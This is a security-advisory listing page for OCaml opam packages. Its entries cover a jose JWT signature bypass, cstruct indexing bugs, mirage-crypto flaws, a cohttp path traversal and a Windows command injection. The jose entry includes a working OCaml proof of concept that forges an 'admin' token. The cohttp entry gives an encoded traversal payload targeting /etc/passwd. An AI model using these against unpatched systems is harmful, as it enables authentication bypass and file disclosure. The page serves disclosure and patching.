Threats Tagged 'opam'
View all threats tagged with 'opam'. Filter and sort to focus on specific types of threats.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threats Tagged 'opam'
Click on any threat for detailed analysis and mitigation recommendations
The opam package "jose" does not validate any RSA signature. It checks the encoding being PKCS1, but does not verify with the public key. ## Reproduction With jose 0.10.0, the code below signs two tokens with the same key and glues one's payload onto the other's signature: ```OCaml let () = Mirage_crypto_rng_unix.use_default () let key = Jose.Jwk.make_priv_rsa (Mirage_crypto_pk.Rsa.generate ~bits:2048 ()) let sign sub = Jose.Jwt.sign key ~payload:(`Assoc [ ("sub", `String sub) ]) |> Result.get_ok |> Jose.Jwt.to<http://jose.jwt.to/>_string let seg n token = List.nth (String.split_on_char '.' token) n let alice = sign "alice" and admin = sign "admin" (* alice's header and signature, admin's payload *) let forged = String.concat "." [ seg 0 alice; seg 1 admin; seg 2 alice ] match Jose.Jwt.unsafe_of_string forged |> Result.get_ok |> Jose.Jwt.validate ~jwk:(Jose.Jwk.pub_of_priv key) ~now:(Ptime_clock.now ()) with | Ok t -> print_endline ("accepted, sub = " ^ Option.get (Jose.Jwt.get_string_claim t "sub")) | Error _ -> print_endline "rejected" ``` The dune file: ``` (executable (name repro) (libraries jose mirage-crypto-pk mirage-crypto-rng.unix ptime.clock.os)) ``` This prints "accepted, sub = admin". ## Workaround There is no workaround known. ## Timeline - 2026-08-25: private report via email to the authors of jose - 2026-08-25: fix published to repository - 2026-08-31: mail escalated to [email protected] - 2026-09-04: released jose 0.11.0 - 2026-09-10: published advisory Join the discussion | GCVE Database | 09/10/2026, 10:00:00 UTC Added: 09/10/2026, 13:23:36 UTC |
Several functions in cstruct may use wrong data, leading to unexpected exceptions and return corrupted data. ## Impact - `Cstruct.filter_map` writes retained bytes at their original input positions, producing corrupted output when earlier bytes are dropped. - `Cstruct.tail ~rev:true` removes two bytes instead of one and raises an exception for single-byte views. - `Cstruct.cuts ~rev:true` may compare input against the wrong data, split at incorrect positions, and construct results using offsets outside the requested view. - `Cstruct.find` and `Cstruct.find_sub ~rev:true` may return slices from the wrong location when operating on non-zero-offset views. These are a set of logical indexing and bounds-calculation errors (CWE-682), and not direct memory-safety vulnerabilities. However, affected operations may return corrupted data, raise an unexpected exception, split input incorrectly, or return bytes outside the requested Cstruct view but still within its backing buffer. In security-sensitive parsers, this could cause validation bypasses, denial of service, or unintended disclosure of adjacent buffer contents. ## Workarounds Users unable to upgrade cstruct should backport the corresponding source changes. There is no configuration-based mitigation since these are buggy library calls. ## References Discovered via [Scrutineer](https://github.com/alpha-omega-security/scrutineer) and Deepseek GLM-5.3 Flash running locally. ## Timeline - 2026-09-04: reported via GitHub to ocaml/security-advisories repository - 2026-09-05: reported via email to [email protected] - 2026-09-05: patch proposed and reviewed - 2026-09-05: release cstruct 6.3.0 - 2026-09-10: published advisory Join the discussion | GCVE Database | 09/10/2026, 10:00:00 UTC Added: 09/10/2026, 13:23:35 UTC |
An issue was discovered in the mirage-crypto-ec package before 2.3.0 for OCaml. There is an EC public key out-of-bounds read for compressed points. Join the discussion | CVE Database V5 | 09/09/2026, 04:19:00 UTC Added: 09/09/2026, 04:38:29 UTC |
0 An issue was discovered in the mirage-crypto-pk package before 2.3.0 for OCaml. There is an undocumented exception for a small message during RSA decryption or encryption. Join the discussion | CVE Database V5 | 09/09/2026, 04:16:24 UTC Added: 09/09/2026, 04:38:29 UTC |
0 An issue was discovered in the utcp package before 0.0.6 for OCaml. Out-of-order segment reassembly allows remote denial of service. Join the discussion | CVE Database V5 | 09/09/2026, 04:13:55 UTC Added: 09/09/2026, 04:38:29 UTC |
An issue was discovered in the mirage-crypto-ec function before 2.2.0 for OCaml. The ECDSA functions {P256,P384,P521}.Dsa.pub_of_octets accept 0x00, the encoding of the point at infinity, as a public key. With that public key, signatures can be forged without a private key. Join the discussion | CVE Database V5 | 09/09/2026, 04:08:54 UTC Added: 09/09/2026, 04:38:29 UTC |
0 An issue was discovered in the mirage-crypto package before 2.2.0 for OCaml. The AES.GCM.authenticate_decrypt_into and Chacha20.authenticate_decrypt_into functions write the decrypted plaintext into a caller-provided buffer and only then compares the tag. On a forged tag, the functions returns false, but the destination buffer already holds the full plaintext. Join the discussion | CVE Database V5 | 09/09/2026, 04:03:53 UTC Added: 09/09/2026, 04:38:29 UTC |
The issue is that the function normalizes the URI path before percent decoding it: ```OCaml let resolve_local_file ~docroot ~uri = let path = Uri.(pct_decode (path (resolve "http" (of_string "/") uri))) in ... ``` Because `%2f` is decoded after Uri.resolve, encoded separators survive dot-segment normalization. For example, a request path like: ``` /static/..%2f..%2f..%2fetc/passwd ``` is normalized as a single encoded segment, then decoded into: ``` /static/../../../etc/passwd ``` afterwards. ## Timeline - Aug 11th 2026: report to [email protected] - Aug 14th 2026: PR published on <https://github.com/mirage/ocaml-cohttp/pull/1145> - Aug 20th 2026: fix released in v6.3.0 <https://github.com/ocaml/opam-repository/pull/30528> Join the discussion | GCVE Database | 08/20/2026, 18:15:00 UTC Added: 08/22/2026, 13:40:24 UTC |
A timing leak vulnerability exists in the scalar multiplication implementation of the mirage-crypto-ec library for NIST elliptic curves. The issue arises from secret-dependent table lookups that do not scan the entire pre-computed table, potentially leaking information through timing side channels. This flaw was introduced in version 0.11.3 and affects multiple versions up to but not including 2.4.0. The vulnerability was reported on August 12, 2026, and fixed in version 2.4.0 released on August 17, 2026. Join the discussion | GCVE Database | 08/17/2026, 09:45:00 UTC Added: 08/17/2026, 16:14:37 UTC |
A vulnerability in OCaml on Windows allows command injection via improper quoting of stdin/stdout/stderr filenames. The function Filename.quote_command does not sufficiently escape the '&' character, enabling an attacker to inject shell commands if they can control these file descriptors. This issue affects multiple OCaml versions prior to 4.14.4 and certain 5.x versions. A fix has been released in OCaml 4.14.4. Join the discussion | GCVE Database | 06/18/2026, 13:45:00 UTC Added: 09/10/2026, 13:23:35 UTC |
Showing 1 to 10 of 11 results